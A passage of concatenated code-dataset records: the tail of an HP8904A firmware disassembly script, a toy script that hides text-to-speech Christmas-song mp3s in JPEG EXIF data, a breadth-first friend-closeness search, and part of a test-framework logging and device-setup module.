0x4ab9, \"TSEQ_STOP\"),\n\n\t\t(2, 0x4196, \"0x4196\"),\t\t# @2:543a\n\t\t(2, 0x642e, \"0x642e\"),\t\t# @2:6581\n\t\t(2, 0x6646, \"0x6646\"),\t\t# @2:72f0\n\t\t(2, 0x6ad0, \"0x6ad0\"),\t\t# @2:72e4 -> 220f\n\t\t(2, 0x6f60, \"0x6f60\"),\t\t# @2:72ea -> 2211\n\t\t(2, 0x6fbe, \"0x6fbe\"),\t\t# @2:735b -> 2213\n\t\t(2, 0x7364, \"APP_DSEQ\"),\n\t\t(2, 0x689b, \"DSEQ_BASE\"),\n\t\t(2, 0x6940, \"DSEQ_ON_LEVEL\"),\n\t\t(2, 0x6917, \"DSEQ_PERIOD\"),\n\t\t(2, 0x6976, \"DSEQ_OFF_LEVEL\"),\n\t\t(2, 0x5b24, \"DSEQ_INDEX\"),\n\t\t(2, 0x5b4e, \"DSEQ_END\"),\n\t\t(2, 0x5bda, \"DSEQ_HEX\"),\n\t\t(2, 0x5b73, \"DSEQ_EDIT\"),\n\t\t(2, 0x69ed, \"DSEQ_BIT\"),\n\t\t(2, 0x6a18, \"DSEQ_CONT\"),\n\t\t(2, 0x6aa1, \"DSEQ_SINGLE\"),\n\t\t(2, 0x6ab8, \"DSEQ_STOP\"),\n\n\t\t(3, 0x471c, \"ROM_CHECK\"),\n\t\t(3, 0x4803, \"0x4803\"),\t\t# @3:4b72 -> 23b0\n\t\t(3, 0x4848, \"0x4848\"),\n\t\t(3, 0x4b1e, \"KEYBOARD_CHECK\"),\n\t\t(3, 0x4b85, \"0x4b85\"),\t\t# @3:4c51 -> 220f\n\t\t(3, 0x4c26, \"APP_DIAG\"),\n\t\t(3, 0x4dcf, \"RAM_CHECK\"),\n\t\t(3, 0x4ef7, \"LCD_CHECK\"),\n\t\t(3, 0x50ce, 
\"0x50ce\"),\t\t# @3:52f2 -> 220f\n\t\t(3, 0x5298, \"MEM_ACCESS\"),\n\t\t(3, 0x530f, \"PLL_CHECK\"),\n\t\t(3, 0x5914, \"0x5914\"),\t\t# @3:5f7f -> 220f\n\t\t(3, 0x5ec8, \"MANUAL_COWCHIP\"),\n\t\t(3, 0x5f96, \"0x5f96\"),\t\t# @3:6230\n\t\t(3, 0x61bb, \"MANUAL_MEMORY\"),\n\t\t(3, 0x6a25, \"0x6a25\"),\t\t# @3:7323 -> 220d\n\t\t(3, 0x6d64, \"0x6d64\"),\t\t# @3:6f6d -> 220d\n\t\t(3, 0x6f80, \"0x6f80\"),\t\t# @3:7233 -> 220d\n\t\t(3, 0x7246, \"APP_XX5\"),\n\t\t(3, 0x7ac3, \"APP_XX6\"),\n\t\t(3, 0x7b7a, \"0x7b7a\"),\n\n\t\t(4, 0x89aa, \"0x89aa\"),\n\t\t(4, 0x8a08, \"SET_MENU\"),\n\t\t(4, 0x8a2f, \"0x8a2f\"),\n\t\t(4, 0x8b4c, \"MENU_EXIT\"),\n\t\t(4, 0x8c14, \"0x8c14\"),\t\t# @0x8d51,0x8edb -> 220f\n\t\t(4, 0x90c9, \"0x90c9\"),\n\t\t(4, 0x9a40, \"0x9a40\"),\t\t# #0x9199\n\t\t(4, 0x9a47, \"0x9a48\"),\t\t# #0x917a\n\t\t(4, 0x9a4b, \"0x9a4b\"),\t\t# #0x9189\n\t\t(4, 0x975e, \"0x975e\"),\n\t\t(4, 0x9b08, \"0x9b08\"),\n\t\t(4, 0x9b70, \"0x9b70\"),\n\t\t(4, 0x9da2, \"0x9da2\"),\n\t\t(4, 0x9e53, \"0x9e53\"),\t\t# @0x8d51,0x8edb -> 220f\n\t\t(4, 0x9e7a, \"0x9e7a\"),\n\t\t(4, 0xa0d4, \"0xa0d4\"),\n\t\t(4, 0xa23f, \"0xa23f\"),\n\t\t(4, 0xa3e3, \"0xa3e3\"),\n\t\t(4, 0xaba9, \"0xaba9\"),\n\t\t(4, 0xabef, \"0xabef\"),\n\t\t(4, 0xb8ad, \"0xb8ad\"),\n\t\t(4, 0xb8cc, \"0xb8cc\"),\n\t\t(4, 0xc1e3, \"0xc1e3\"),\n\t\t(4, 0xc239, \"NULL\"),\n\t\t(4, 0xc242, \"MEMCMP\"),\n\t\t(4, 0xc285, \"MEMCPY\"),\n\t\t(4, 0xc418, \"0xc418\"),\n\t\t(4, 0xc7b0, \"0xc7b0\"),\n\t\t(4, 0xc855, \"0xc855\"),\n\t\t(4, 0xc885, \"0xc885\"),\n\t\t(4, 0xc973, \"0xc973\"),\n\t\t(4, 0xcb10, \"0xcb10\"),\n\t\t(4, 0xcc09, \"0xcc09\"),\n\t\t(4, 0xccb5, \"0xccb5\"),\n\t\t(4, 0xccff, \"0xccff\"),\n\t\t(4, 0xcd50, \"0xcd50\"),\n\t\t(4, 0xd022, \"0xd022\"),\n\t\t(4, 0xd17d, \"0xd17d\"),\n\t\t(4, 0xd2c6, \"0xd2c6\"),\n\t\t(4, 0xd37d, \"NUM=\"),\n\t\t(4, 0xd3c6, \"NUM-\"),\n\t\t(4, 0xd392, \"NUM+\"),\n\t\t(4, 0xd57c, \"0xd57c\"),\n\t\t(4, 0xd71d, \"LCD_WR_CTRL\"),\n\t\t(4, 0xd73f, \"LCD_WR_DATA\"),\n\t\t(4, 0xd761, \"LCD_RD_DATA\"),\n\t\t(4, 0xd781, \"LCD_RD_CTRL\"),\n\t\t(4, 0xd7a0, \"LCD_DDRAM\"),\n\t\t(4, 0xd8ea, \"DISPLAY\"),\n\t\t(4, 0xd989, \"DISPLAY2L\"),\n\t\t(4, 0xd9e6, \"LCD_INIT\"),\n\t\t(4, 0xdae0, \"BANKSWITCH\"),\n\t\t(4, 0xdb2b, \"CALL_BANK\"),\n\t\t(4, 0xdc7b, \"RAM_ROM_TEST\"),\n\t\t(4, 0xdc82, \"RAM_TEST\"),\n\t\t(4, 0xdca9, \"ROM_SUM\"),\n\t\t(4, 0xdd1e, \"APP_JMP\"),\n\t\t(4, 0xdeb6, \"0xdeb6\"),\n\t\t(4, 0xe029, \"0xe029\"),\n\t\t(4, 0xe185, \"0xe185\"),\n\t\t(4, 0xe319, \"0xe319\"),\n\t\t(4, 0xe69c, \"0xe69c\"),\n\t\t(4, 0xe8a7, \"0xe8a7\"),\n\t\t(4, 0xf02a, \"0xf02a\"),\n\t\t(4, 0xf044, \"0xf044\"),\n\t\t(4, 0xf1d9, \"0xf1d9\"),\n\t\t(4, 0xf3f0, \"0xf3f0\"),\n\t\t(4, 0xf7ec, \"0xf7ec\"),\n\t\t(4, 0xf9d4, \"0xf9d4\"),\n\t\t(4, 0xfd50, \"PROLOGUE\"),\n\n\t\t(6, 0x0300, \"LCD_CTL\"),\n\t\t(6, 0x0301, \"LCD_DATA\"),\n\t\t(6, 0x2223, \"MAIN_MENU_LAST_PG\"),\n\t\t(6, 0x2240, \"MENU_PTR\"),\n\t\t(6, 0x2245, \"MAIN_MENU_CUR_PG\"),\n\t\t(6, 0x2242, \"MENU_CNT\"),\n\t\t(6, 0x247b, \"CUR_BANK\"),\n\t\t(6, 0x247c, \"APP_BANK\"),\n\t\t(6, 0x247d, \"APP_VECTOR\"),\n\t\t(6, 0x3ffc, \"OPTIONS\"),\n\t\t(6, 0xed11, \"blank_line\"),\n\t]:\n\t\tif p == pj.pg:\n\t\t\tassert a >= pj.m.lo and a < pj.m.hi\n\t\t\tcpu.disass(pj, a)\n\t\tif p == pj.pg or p >= 4:\n\t\t\tpj.set_label(a, n)\n\n\n#######################################################################\n\ndef romsum(pj):\n\tb = 0\n\tc = 0\n\tfor x in range(pj.m.lo, pj.m.hi):\n\t\tb += pj.m.rd(x) + c\n\t\tc = b >> 8\n\t\tc = 1\n\t\tb &= 0xff\n\tprint(\"CKSUM(0x%04x-0x%04x) = 0x%x\" % (pj.m.lo, 
pj.m.hi, b))\n\n\tif pj.pg == 0:\n\t\ty = data.Const(pj, 0x4002, 0x4003)\n\t\tpj.set_label(y.lo, \"EPROM_PAGES\")\n\n\tif pj.pg < 4:\n\t\tassert b == pj.pg\n\n\t\ty = data.Const(pj, 0x4001, 0x4002)\n\t\tpj.set_label(y.lo, \"EPROM_SUM_%d\" % pj.pg)\n\n\t\ty = data.Const(pj, 0x4000, 0x4001, \"'%c'\")\n\t\tassert pj.m.rd(y.lo) == 0x30 + pj.pg\n\t\tpj.set_label(y.lo, \"EPROM_PAGE_%d\" % pj.pg)\n\n\telse:\n\t\tassert b == 0\n\n#######################################################################\n\ndef lexer(pj):\n\n\tassert pj.pg == 4\n\n\tclass lex(data.Data):\n\t\tdef __init__(self, pj, lo, pfx):\n\t\t\thi = lo + 4\n\t\t\tself.f = pj.m.rd(lo + 1)\n\t\t\tself.t = pj.m.bu16(lo + 2)\n\t\t\tself.pfx = pfx + \"%c\" % pj.m.rd(lo)\n\t\t\tif self.f > 0:\n\t\t\t\thi += 1\n\t\t\tsuper(lex, self).__init__(pj, lo, hi, \"lex\")\n\t\t\tif self.f > 0 and self.pfx in hpib:\n\t\t\t\tself.lcmt += hpib[self.pfx] + \"\\n\"\n\t\t\tself.compact = True\n\t\t\tif self.f > 0:\n\t\t\t\tpj.set_label(self.t, \"J_\" + self.pfx)\n\t\t\t\tcpu.disass(pj, self.t)\n\n\t\tdef render(self, pj):\n\t\t\ts = \".LEX\\t\\\"%s\\\", \" % self.pfx\n\t\t\ts += \"%d, \" % pj.m.rd(self.lo + 1)\n\t\t\ts += pj.render_adr(pj.m.bu16(self.lo + 2))\n\t\t\tif self.f:\n\t\t\t\ts += \", 0x%02x\" % pj.m.rd(self.lo + 4)\n\t\t\treturn s\n\n\tdef tx(a, pfx):\n\t\tt0 = a\n\t\twhile pj.m.rd(a) != 0:\n\t\t\ty = lex(pj, a, pfx)\n\t\t\ta = y.hi\n\t\t\tif y.f == 0:\n\t\t\t\tb = pj.m.bu16(y.lo + 2)\n\t\t\t\tp = pfx + \"%c\" % pj.m.rd(y.lo)\n\t\t\t\tpj.set_label(b, \"LEX_\" + p)\n\t\t\t\ttx(b, p)\n\t\tdata.Const(pj, a, a + 1)\n\n\tpj.set_label(0x9780, \"LEXTAB_ALPHABET\")\n\tn = 65\n\tfor i in range(0x9780, 0x97b4, 2):\n\t\tdata.Dataptr(pj, i, i + 2, pj.m.bu16(i))\n\t\ta = pj.m.bu16(i)\n\t\tif n != 0x5a:\n\t\t\tpj.set_label(a, \"LEX_%c\" % n)\n\t\telse:\n\t\t\tpj.set_label(a, \"LEX_NULL\")\n\t\ttx(a, \"%c\" % n)\n\t\tn += 1\n\n\tpj.set_label(0x9a22, \"LEXTAB_OTHER\")\n\ttx(0x9a22, \"\")\n\n#######################################################################\n# Switch statements\n\ndef do_switch():\n\tretval=False\n\tfor i in pj:\n\t\tif i.tag != \"mc6809\":\n\t\t\tcontinue\n\t\tif pj.m.bu16(i.lo) != 0x6e9b:\n\t\t\tcontinue\n\t\tfor j in pj.gaps():\n\t\t\tif j[0] == i.hi:\n\t\t\t\tbreak\n\t\tif j[0] != i.hi:\n\t\t\tcontinue\n\t\tprint(\"SWITCH\", i, \"%04x-%04x\" % (j[0], j[1]))\n\t\tretval=True\n\t\tfor k in range(j[0], j[1], 2):\n\t\t\t# print(\" %04x\" % k)\n\t\t\tx = pj.t.find_lo(k)\n\t\t\tif len(x) > 0:\n\t\t\t\tbreak\n\t\t\tx = pj.m.bu16(k)\n\t\t\ti.add_flow(pj, \">JC\", \"EQ\", x, i.lang)\n\t\t\tcpu.disass(pj, x)\n\t\t\twhile pj.run():\n\t\t\t\tpass\n\t\tfor l in range(j[0], k + 2, 2):\n\t\t\tcpu.codeptr(pj, l)\n\treturn retval\n\n#######################################################################\n\nclass Num(data.Data):\n\tdef __init__(self, pj, lo):\n\t\tsuper(Num, self).__init__(pj, lo, lo + 3, \"Num\")\n\t\ta = pj.m.rd(lo) << 16\n\t\ta += pj.m.rd(lo + 1) << 8\n\t\ta += pj.m.rd(lo + 2)\n\t\tself.fmt = \".NUM\\t%d\" % a\n\t\tpj.set_label(lo, \"N%d\" % a)\n\n#######################################################################\n\nclass MenuPage(data.Data):\n\tdef __init__(self, pj, cpu, lo):\n\t\tsuper(MenuPage, self).__init__(pj, lo, lo + 10, \"MenuPage\")\n\t\tt = pj.m.bu16(lo)\n\t\ty1 = data.Txt(pj, t, t + 40, label=False)\n\t\ty1.compact = True\n\t\ty2 = data.Txt(pj, t + 40, t + 80, label=False)\n\t\ty2.compact = True\n\t\tself.t1 = y1.txt\n\t\tself.t2 = y2.txt\n\t\tself.ptr = []\n\t\tfor i in range(1, 5):\n\t\t\tu = pj.m.bu16(lo + 2 * 
i)\n\t\t\tself.ptr.append(u)\n\t\t\tif u >= pj.m.lo and u < pj.m.hi:\n\t\t\t\tcpu.disass(pj, u)\n\n\tdef render(self, pj):\n\t\ts = \"MENUPAGE {\\n\"\n\t\ts += \"\\t.txt1 = \\\"%s\\\"\\n\" % self.t1\n\t\ts += \"\\t.txt2 = \\\"%s\\\"\\n\" % self.t2\n\t\tfor i in range(4):\n\t\t\ts += \"\\t.f%d = \" % (i + 1)\n\t\t\ts += \"%s\\n\" % pj.render_adr(self.ptr[i])\n\t\ts += \"}\"\n\t\treturn s\n\ndef Menu(pj, cpu, a, nm):\n\tpj.set_label(a, nm)\n\tdata.Const(pj, a - 1, a)\n\tn = pj.m.rd(a - 1)\n\tfor i in range(0, n + 1):\n\t\tMenuPage(pj, cpu, a + i * 10)\n\n#######################################################################\n\ndef hints(pj, cpu):\n\n\tif pj.pg == 0:\n\t\tMenu(pj, cpu, 0x433e, \"CHANMENU\")\n\n\t\t# @0x8948\n\t\tdata.Const(pj, 0x4003, 0x4004)\n\n\t\t# @0x8954\n\t\tfor a in range(0x4004,0x4008,2):\n\t\t\tcpu.codeptr(pj, a)\n\n\t\t# @0x8960\n\t\tfor a in range(0x4008,0x4018,2):\n\t\t\tcpu.codeptr(pj, a)\n\n\t\tfor a in range(0x4018, 0x4022, 2):\n\t\t\ty = data.Dataptr(pj, a, a + 2, pj.m.bu16(a))\n\t\t\tu = pj.m.bu16(a)\n\t\t\ty = data.Txt(pj, u, u + 40, label=False)\n\t\t\ty.compact = True\n\n\t\t# @8e1a, @8f08\n\t\tfor a in range(0x4022,0x4026,2):\n\t\t\tcpu.codeptr(pj, a)\n\n\t\t# @0xc4a5, @0xc318\n\t\tfor a in range(0x404f,0x4053,2):\n\t\t\tcpu.codeptr(pj, a)\n\n\t\tfor a in (0x4027, 0x411b, 0x4143, 0x416b, 0x4193):\n\t\t\ty = data.Txt(pj, a, a + 0x28, label=False)\n\t\t\ty.compact = True\n\n\t\ty = data.Txt(pj, 0x41bb, 0x41bb + 12, label=False)\n\t\ty.compact = True\n\n\n\tif pj.pg == 1:\n\t\tMenu(pj, cpu, 0x416b, \"TONEMENU\")\n\t\tMenu(pj, cpu, 0x4234, \"DTMFMENU\")\n\n\t\tfor a in (0x69a6,):\n\t\t\ty = data.Txt(pj, a, a + 0x28, label=False)\n\t\t\ty.compact = True\n\t\tfor a in (0x4142,0x4156):\n\t\t\ty = data.Txt(pj, a, a + 0x14, label=False)\n\t\t\ty.compact = True\n\t\tfor a in range(0x43bc, 0x43f2, 3):\n\t\t\tdata.Const(pj, a, a + 3)\n\n\tif pj.pg == 2:\n\t\tMenu(pj, cpu, 0x416b, \"DSEQMENU\")\n\t\tfor a in range(0x4245, 0x4255, 2):\n\t\t\tcpu.codeptr(pj, a)\n\t\tfor a in range(0x4330, 0x4340, 2):\n\t\t\tcpu.codeptr(pj, a)\n\n\tif pj.pg == 3:\n\t\tMenu(pj, cpu, 0x4178, \"DIAGMENU\")\n\t\tMenuPage(pj, cpu, 0x4196)\n\t\tfor i in range(0x3f):\n\t\t\ta = 0x7349 + 4 * i\n\t\t\ty = data.Const(pj, a, a + 2)\n\t\t\ty.typ = \".BYTE\"\n\t\t\ty.fmt = \"%d, %d\" % (pj.m.rd(a), pj.m.rd(a + 1))\n\t\t\tu = pj.m.bu16(a + 2)\n\t\t\tl = pj.m.rd(a + 1)\n\t\t\tdata.Dataptr(pj, a + 2, a + 4, pj.m.bu16(a + 2))\n\t\t\ty = data.Txt(pj, u, u + l, label=False)\n\t\t\ty.compact = True\n\t\tfor a,b in (\n\t\t\t(0x4002,53),\n\t\t\t(0x41a0,40),\n\t\t\t(0x41c8,0x1a),\n\t\t\t(0x41e2,40),\n\t\t\t(0x420a,40),\n\t\t\t(0x4232,16),\n\t\t\t(0x4242,16),\n\t\t\t(0x4252,40),\n\t\t\t(0x4292,0x1a),\n\t\t\t(0x42ac,40),\n\t\t\t(0x42d4,0x1a),\n\t\t\t(0x42ee,0x1a),\n\t\t\t(0x4308,40),\n\t\t\t(0x4330,40),\n\t\t\t(0x4358,40),\n\t\t\t(0x4386,0x1a),\n\t\t\t(0x43a0,12),\n\t\t\t(0x43ac,40),\n\t\t\t(0x43d4,40),\n\t\t\t(0x43fc,0x1a),\n\t\t\t(0x4416,40),\n\t\t\t(0x443e,40),\n\t\t\t(0x4466,6),\n\t\t\t(0x66fa,16),\n\t\t\t(0x670a,40),\n\t\t\t(0x6732,40),\n\t\t\t(0x675a,40),\n\t\t\t(0x6782,40),\n\t\t\t(0x67aa,40),\n\t\t\t(0x67d2,40),\n\t\t\t(0x67fa,40),\n\t\t\t(0x681a,40),\n\t\t\t(0x6822,40),\n\t\t):\n\t\t\ty = data.Txt(pj, a, a + b, label=False)\n\t\t\ty.compact = True\n\n\t\tfor a in range(0x63b2, 0x66fa, 40):\n\t\t\ty = data.Txt(pj, a, a + 40, label=False)\n\t\t\ty.compact = True\n\n\t\ta = 0x4c64\n\t\twhile a < 0x4dcb:\n\t\t\ty = data.Txt(pj, a)\n\t\t\ty.compact = True\n\t\t\ta = y.hi\n\n\t\ta = 0x54cf\n\t\twhile a < 
0x550d:\n\t\t\ty = data.Txt(pj, a)\n\t\t\ty.compact = True\n\t\t\ta = y.hi\n\n\t\ta = 0x624d\n\t\twhile a < 0x63a4:\n\t\t\ty = data.Txt(pj, a)\n\t\t\ty.compact = True\n\t\t\ta = y.hi\n\n\n\tif pj.pg == 4:\n\t\tdata.Const(pj, 0xfd6e, 0xfd70)\n\t\tfor a in range(0xee62, 0xee88, 2):\n\t\t\tu = pj.m.bu16(a)\n\t\t\ty = data.Dataptr(pj, a, a + 2, u)\n\t\t\ty = data.Const(pj, u, u + 1)\n\t\t\ty = data.Txt(pj, u + 1, u + 1 + pj.m.rd(u), label=False)\n\t\t\ty.compact = True\n\t\tfor a in range(0xeeee, 0x0ef0e, 2):\n\t\t\tu = pj.m.bu16(a)\n\t\t\ty = data.Dataptr(pj, a, a + 2, u)\n\t\t\ty = data.Const(pj, u, u + 1)\n\t\t\ty = data.Txt(pj, u + 1, u + 1 + pj.m.rd(u), label=False)\n\t\t\ty.compact = True\n\t\tfor a in range(0xef94, 0xf014, 8):\n\t\t\ty = data.Const(pj, a, a + 8, fmt=\"0x%02x\")\n\n\t\tfor a,b in (\n\t\t\t(0x8f7c,35),\n\t\t\t(0x977b, 5),\n\t\t\t(0xed11,40),\n\t\t\t(0xea99,0x23),\n\t\t\t(0xeae4,13),\n\t\t\t(0xeb41,40),\n\t\t\t(0xeb69,40),\n\t\t\t(0xec5b,14),\n\t\t\t(0xec69,14),\n\t\t\t(0xec77,14),\n\t\t\t(0xec85,0x36),\n\t\t\t(0xecbb,6),\n\t\t\t(0xecc1,40),\n\t\t\t(0xece9,40),\n\t\t):\n\t\t\ty = data.Txt(pj, a, a + b, label=False)\n\t\t\ty.compact = True\n\n\t\tdef char_def(pj, a):\n\t\t\tfor i in range(8):\n\t\t\t\ty = data.Data(pj, a + i, a + i + 1)\n\t\t\t\tx = pj.m.rd(a + i)\n\t\t\t\ty.fmt = \".BITS\\t\"\n\t\t\t\tfor j in range(8):\n\t\t\t\t\tif x & 0x80:\n\t\t\t\t\t\ty.fmt += \"#\"\n\t\t\t\t\telse:\n\t\t\t\t\t\ty.fmt += \"-\"\n\t\t\t\t\tx = x << 1\n\n\t\tl = [ \"LCD_CHR_f\", \"LCD_CHR_1\", \"LCD_CHR_2\", \"LCD_CHR_3\",\n\t\t \"LCD_CHR_4\", \"LCD_CHR_phi\", \"LCD_CHR_mu\", \"LCD_CHR_is\", ]\n\t\tfor a in range(0xea15, 0xea4e, 8):\n\t\t\tpj.set_label(a, l.pop(0))\n\t\t\tchar_def(pj, a)\n\n\t\tdata.Const(pj, 0x929d, 0x929d + 8)\n\t\tdata.Const(pj, 0x9777, 0x9777 + 4)\n\t\tdata.Const(pj, 0xdd73, 0xdd9d)\n\n\t\t# 2 x 35 bytes, no idea...\n\t\tfor a in range(0xed89, 0xedcf, 5):\n\t\t\tdata.Const(pj, a, a + 5, \"0x%02x\")\n\n\t\tfor a in range(0xee47, 0xee62, 3):\n\t\t\tNum(pj, a)\n\n\t\tfor a in (0xea55, 0xea58, 0xea5f, 0xea62, 0xea65,\n\t\t 0xea68, 0xea6b, 0xea6e):\n\t\t\tNum(pj, a)\n\n\n#######################################################################\n# Function prologues\n\ndef prologues(pj, cpu):\n\tfor i in pj:\n\t\tif i.tag != \"mc6809\":\n\t\t\tcontinue\n\t\tif i.dstadr != 0xfd50:\n\t\t\tcontinue\n\t\tj = pj.t.find_hi(i.lo)\n\t\tif len(j) == 0:\n\t\t\tprint(\"NO PROLOGUE %04x\" % i.lo, i)\n\t\t\tcontinue\n\t\tif pj.m.rd(j[0].lo) == 0xfc:\n\t\t\tj[0].mne=\"ldd__\"\n\t\t\tu = pj.m.bu16(j[0].lo + 1)\n\t\t\tv = pj.m.bu16(u)\n\t\t\tj[0].mne=\"ldd__%d\" % v\n\t\t\tdata.Const(pj, u, u + 1)\n\t\t\tdata.Const(pj, u + 1, u + 2)\n\n#######################################################################\n\nfor pg in (0,1,2,3,4):\n\n\tpj,m = setup(pg)\n\n\tromsum(pj)\n\n\tcpu = mc6809.mc6809()\n\n\thints(pj, cpu)\n\n\tsymb(pj, cpu)\n\n\tif pj.pg == 4:\n\t\tlexer(pj)\n\t\tcpu.vectors(pj)\n\n\twhile pj.run():\n\t\tpass\n\n\twhile do_switch():\n\t\tcontinue\n\n\twhile pj.run():\n\t\tpass\n\n\tprologues(pj, cpu)\n\n\tcode.lcmt_flows(pj)\n\n\tlisting.Listing(pj)\n\n\timport example2\n\n\texample2.analyse(pj)\n\n\tpj.name = pj.name + \"_A\"\n\n\tlisting.Listing(pj)\n","sub_path":"examples/HP8904A/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":18247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"140498767","text":"from gtts import gTTS\nfrom stegano import exifHeader\nimport os\n\nfirst = 'A partridge in a pear 
tree'\nsecond = 'two turtle doves'\nthird = 'three french hens'\nfourth = 'four calling birds'\nfifth = 'five golden rings'\nsixth = 'six geese a laying'\nseventh = 'seven swans a swimming'\neigth = 'eigth maids a milking'\nnineth = 'nine ladies dancing'\ntenth = 'ten lords a leaping'\neleventh = 'eleven pipers piping'\ntwelfth = 'twelve drummers drumming'\n\nsong = [first, second, third, fourth, fifth, sixth, seventh, eigth, nineth, tenth, eleventh, twelfth]\n\nos.chdir('part_1_output')\n\ndef get_bytes_from_file(filename): \n return open(filename, \"rb\").read() \n\n# Iterate over song list and convert them to mp3.\nfor item in song:\n myobj = gTTS(text=item, lang='en', slow=False)\n myobj.save(f\"{item}.mp3\") \n\npicture_num = 0\n# Iterate over the songs and copy them to their own secret picture\nfor file in os.listdir():\n picture_num += 1\n if file == 'cactus.jpeg' or file == '.DS_Store':\n continue\n print(file)\n bytes = get_bytes_from_file(file)\n secret = exifHeader.hide(\"cactus.jpeg\",f\"secret_{picture_num}.jpeg\", bytes)\n\nfor file in os.listdir():\n if 'mp3' in file:\n os.remove(file)","sub_path":"part_1.py","file_name":"part_1.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"213183203","text":"def print_all_friends(g, start):\n qu = [] # queue of people still to be processed\n done = set() # people already added to the queue (prevents duplicates)\n \n qu.append((start, 0)) # bundle each person's info into one tuple; the start person's closeness is 0\n done.add(start) # record it in the set as well\n \n while qu: # while people remain in the queue\n (p, d) = qu.pop(0) # pop the next entry from the queue into p and d\n print(p, d) # print the person's name and closeness\n for x in g[p]: # among p's friends\n if x not in done: # anyone not yet added to the queue\n qu.append((x, d + 1)) # enqueue with closeness increased by 1\n done.add(x) # and record in the set as well
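\n\n# Editor's note (added): the FIFO queue makes this a breadth-first search, so\n# people print in nondecreasing closeness and each printed value is the\n# shortest friend-path distance from the start person.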
\n\nfriend_info = {\n 'Summer': ['John', 'Justin', 'Mike'],\n 'John': ['Summer', 'Justin'],\n 'Justin': ['John', 'Summer', 'Mike', 'May'],\n 'Mike': ['Summer', 'Justin'],\n 'May': ['Justin', 'Kim'],\n 'Kim': ['May'],\n 'Tom': ['Jerry'],\n 'Jerry': ['Tom']\n}\n\nprint_all_friends(friend_info, 'Summer')\nprint()\nprint_all_friends(friend_info, 'Jerry')","sub_path":"친구와 친밀도 찾기.py","file_name":"친구와 친밀도 찾기.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"556089228","text":"__author__ = 'Sean Yu'\n'''created @2015/9/29''' \nimport unittest\nimport os\nimport sys\nimport re, datetime\npardir =os.path.dirname(os.path.realpath(os.getcwd()))\nsubfolder = ['lib', 'dut']\nfor sub in subfolder:\n libpath = os.path.sep.join([pardir,sub])\n if libpath not in sys.path:\n sys.path.insert(0,libpath)\nimport os\nfrom common import bench2dict\nimport pprint,traceback\nfor path in sys.path:\n pass\n #print(path)\ndef logAction(fun):\n def inner(*arg, **kwargs):\n try:\n msg ='Called function: %s'%(fun.__name__)\n #print(msg)\n response = fun(*arg, **kwargs)\n return response\n except Exception as e:\n arglist = list(arg)\n argstring =''\n import pprint as pp\n if type(arglist)==type([]):\n argstring = pp.pformat(arglist)\n else:\n argstring = arglist\n #for a in arglist:\n # argstring +='\\n\\t\\t'+str(a)\n kwargstring = ''\n kwargstring = pp.pformat(kwargs)\n #for k,v in kwargs:\n # kwargstring += '\\n\\t\\t%s: %s'%(str(k),str(v))\n #print('!!!ERROR!!!:\\n')\n #print(traceback.format_exc())\n msg ='*logAction dump:\\n\\tFunction Name: \\t\\t%s\\n\\tArguments: \\t\\t%s\\n\\tKeyword Arguments: \\t\\t%s'%(fun.__name__, argstring, kwargstring)\n from common import DumpStack\n msg =msg +'\\n-------------------------------------------------------------------------------'+DumpStack(e)\n msg = '\\n*********************************ERROR DUMP************************************\\n'+msg.replace('\\n', '\\n*')+'*********************************ERROR END*************************************\\n\\n'\n #print(msg)\n import os\n with open(os.getcwd()+'/error.txt','a+') as errorfile:\n errorfile.write(msg)\n raise e\n return inner\n return inner\n#@logAction\ndef createLogger(name, logpath='./'):\n #create a unique folder for case, and logfile for case\n if not os.path.exists(logpath):\n os.mkdir(logpath)\n import logging\n logfile = os.path.abspath(logpath)+\"/%s.log\"%(name)\n logger = logging.Logger(name,logging.DEBUG)\n hdrlog = logging.FileHandler(logfile)\n hdrlog .setFormatter(logging.Formatter('%(asctime)s -%(levelname)s: %(message)s'))\n logger.addHandler(hdrlog )\n return logger\nimport threading\ngPathLocker = threading.Lock()\ngShareDataLock= threading.Lock()\ngShareData={}\n#@logAction\ndef createLogDir(name,logpath='./', add_time=True):\n global gPathLocker\n gPathLocker.acquire()\n import os\n old_logpath=logpath\n def listDir(path):\n folders = []\n while 1:\n path, folder = os.path.split(path)\n\n if folder != \"\":\n folders.insert(0, folder)\n else:\n if path != \"\":\n folders.insert(0,path)\n break\n return folders\n old_cwd= os.getcwd()\n old_cwd = listDir(old_cwd)\n logpath = listDir(os.path.abspath(logpath))\n\n\n\n fullname = name[:60]\n removelist = '\\-_.'\n pat = r'[^\\w'+removelist+']'\n name = re.sub(pat, '', fullname)\n if add_time:\n tm = datetime.datetime.now().isoformat('_')\n tm = '-'+ re.sub(pat, '', tm)\n else:\n tm =''\n fullname = name+tm\n for dir in logpath:\n #print(os.getcwd())\n if os.path.exists(dir):\n #print(os.getcwd())\n os.chdir(dir)\n #print(os.getcwd())\n else:\n errormsg= 'dir: %s does not exist, please create it first'%dir\n for dir in old_cwd:\n os.chdir(dir)\n print(os.getcwd())\n print(errormsg)\n gPathLocker.release()\n raise Exception(errormsg)\n\n if not os.path.exists(fullname):\n #print(len(fullname))\n if len(fullname)>30:\n pass\n os.mkdir(fullname)\n logpath.append(fullname)\n #print(\"old_cwd:\",old_cwd)\n for dir in old_cwd:\n os.chdir(dir)\n #print(os.getcwd())\n gPathLocker.release()\n return old_logpath+'/'+fullname\n\n#@logAction\ndef openDutLogfile(duts, logpath, logger):\n for dut_name in duts.keys():\n duts[dut_name].openLogfile(logpath)\n logger.info(\"DUT %s redirected to case folder\"%dut_name)\n\n#@logAction\ndef initDUT(errormessage ,bench, dutnames, logger=None, casepath='./', shareData=None, dry_run =False):\n dictDUTs={}\n\n def connect2dut(InitErrorMessage , dutname, dut_attr, logger=None,path='./', shareData=None, dry_run =False):\n msg = ''\n try:\n import os\n if dut_attr[\"SUT\"].strip() =='':\n if os.name!='nt':\n raise ImportError('need implement default session for non-NT')#sutattr['SUT'] ='Session'\n else:\n dut_attr['SUT'] ='winTelnet'\n\n classname = dut_attr[\"SUT\"]\n #print(sys.path)\n ModuleName = __import__(classname)\n ClassName = ModuleName.__getattribute__(classname)\n\n ses= ClassName(dutname, dut_attr,logger=logger ,logpath = path, shareData = shareData)\n try:\n ses.dry_run = dry_run\n except Exception as e:\n msg ='%s does not support dry_run'%(dutname)\n if logger is not 